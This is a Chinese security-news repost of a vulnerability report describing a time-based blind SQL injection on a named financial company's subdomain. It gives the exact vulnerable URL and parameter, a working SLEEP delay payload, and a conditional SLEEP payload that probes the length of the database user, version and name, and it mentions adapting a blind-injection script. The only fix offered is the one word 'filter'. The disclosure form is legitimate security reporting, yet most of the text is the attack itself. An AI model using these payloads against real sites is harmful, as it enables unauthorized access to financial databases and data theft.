频道栏目
首页 > 资讯 > 网站安全 > 正文

金融安全之众信金融某站SQL注入漏洞

16-05-14        来源:[db:作者]  
收藏   我要投稿

金融安全之众信金融某站SQL注入漏洞

基于时间的盲注.http://am.imzhongxin.com/account/count.php?id=24。大哥说我是渣渣,连个时间盲注都搞不定.http://am.imzhongxin.com/account/count.php?id=24 AND (SELECT * FROM (SELECT(SLEEP(10)))x) 成功延时..
http://am.imzhongxin.com/account/count.php?id=24 and (SELECT * FROM (SELECT(SLEEP(3-(IF((select LENGTH(concat(user(),0x3a,version(),0x3a,database())))=31,0,3)))))CNfW)%23
赶紧修改了个tangscan的盲注脚本来处理这个问题.

执行concat(user(),0x3a,version(),0x3a,database())获取到的信息.
解决方案:过滤

相关TAG标签
上一篇:安卓变僵尸:新型病毒“维京部落”分析
下一篇:DarkHotel定向攻击样本分析
相关文章
图文推荐

关于我们 | 联系我们 | 广告服务 | 投资合作 | 版权申明 | 在线帮助 | 网站地图 | 作品发布 | Vip技术培训 | 举报中心

版权所有: 红黑联盟--致力于做实用的IT技术学习网站